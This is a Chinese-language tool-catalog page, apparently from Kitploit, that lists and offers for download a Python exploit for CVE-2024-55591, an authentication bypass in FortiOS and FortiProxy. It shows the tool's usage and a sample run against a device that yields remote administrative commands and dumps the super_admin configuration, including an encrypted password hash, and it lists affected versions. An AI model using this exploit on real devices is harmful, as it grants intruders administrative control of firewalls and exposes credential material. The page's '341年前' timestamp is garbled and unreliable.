Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
fortios-auth-bypass-exploit-CVE-2024-55591 — Python 针对 CVE-2024-55591 的漏洞利用程序,绕过 FortiOS 身份验证,在易受攻击的 FortiGate 和 FortiProxy 设备上执行远程命令。 | Kitploit
工具/GitHubGitHub/sysirq/fortios-auth-bypass-exploit-cve-2024-55591
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubsysirq/fortios-auth-bypass-exploit-cve-2024-55591

fortios-auth-bypass-exploit-CVE-2024-55591

Python 针对 CVE-2024-55591 的漏洞利用程序,绕过 FortiOS 身份验证,在易受攻击的 FortiGate 和 FortiProxy 设备上执行远程命令。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
341年前尚未审核

CVE-2024-55591

一个 Fortinet FortiOS 身份验证绕过漏洞利用工具

描述

使用此 exp,您可以绕过身份验证并运行命令

用法

root@kitploit:~
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py 
usage: exp.py [-h] --target TARGET [--port PORT] [--username USERNAME] [--cmd CMD]
exp.py: error: the following arguments are required: --target/-t

演示

image-20250122220404985

image-20250122220502121

image-20250122220502121

输出

root@kitploit:~
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py -t 192.168.182.188 -p 443 -u admin -c 'show system admin'
CLI websocket initialized
\x00l_Process_Access" "Local_Process_Access" "root" "" ""  \x08"none" [192.168.182.1]:35950 [192.168.182.188]:443
Unknown action 0

FortiGate-VM64-KVM # 
wait for next action
CLI websocket initialized
\x00_Process_Access" "Local_Process_Access" "root" "" ""  \x08"none" [192.168.182.1]:40050 [192.168.182.188]:443
Unknown action 0

FortiGate-VM64-KVM # 
wait for next action
CLI websocket initialized
\x00 system admin
config system admin
    edit "admin"
        set accprofile "super_admin"
        set vdom "root"
        set password ENC SH2brnbwbooMvuSyHfEe82/cs0ehaIB2Kf06G/QYlI67PLGoEVKGJCGbYGqItg=
    next
end

受影响版本

  • FortiOS 7.0.0 至 7.0.16
  • FortiProxy 7.0.0 至 7.0.19
  • FortiProxy 7.2.0 至 7.2.12
下载工具